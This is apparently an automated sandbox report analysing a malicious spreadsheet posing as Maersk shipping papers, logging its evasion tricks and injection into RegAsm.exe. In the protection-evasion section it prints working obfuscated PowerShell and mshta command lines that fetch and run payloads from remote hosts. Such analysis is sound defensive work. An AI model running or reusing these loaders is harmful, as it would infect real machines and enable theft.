                    Source: Maersk BL, IN & PL.xlsStream path 'Workbook' entropy: 7.99880150553 (max. 8.0)
                    Source: 6E530000.0.drStream path 'MBD00201B08/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: 6E530000.0.drStream path 'Workbook' entropy: 7.99873878072 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040F7E2 Sleep,ExitProcess,31_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,31_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7481Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1615Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 517Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1858Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5903Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1282
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3683
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9272
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1688
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1459
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 824
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6083
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                    Source: C:\Windows\System32\mshta.exe TID: 3872Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep count: 2477 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 7481 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep count: 1858 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep count: 5903 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2248Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -1800000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\mshta.exe TID: 2708Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 1282 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 3683 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1896Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 332Thread sleep count: 259 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 332Thread sleep time: -129500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 744Thread sleep count: 169 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 744Thread sleep time: -507000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2376Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 744Thread sleep count: 9272 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 744Thread sleep time: -27816000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1688Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 908Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep count: 824 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 6083 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep time: -1800000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10006580 FindFirstFileExA,23_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040AE51 FindFirstFileW,FindNextFileW,26_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00418981 memset,GetSystemInfo,26_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_28-34250
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10004AB4 mov eax, dword ptr fs:[00000030h]23_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00443355 mov eax, dword ptr fs:[00000030h]31_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_1000724E GetProcessHeap,23_2_1000724E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434BD8 SetUnhandledExceptionFilter,31_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0043BB71

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTR
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe31_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419662 mouse_event,31_2_00419662
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcb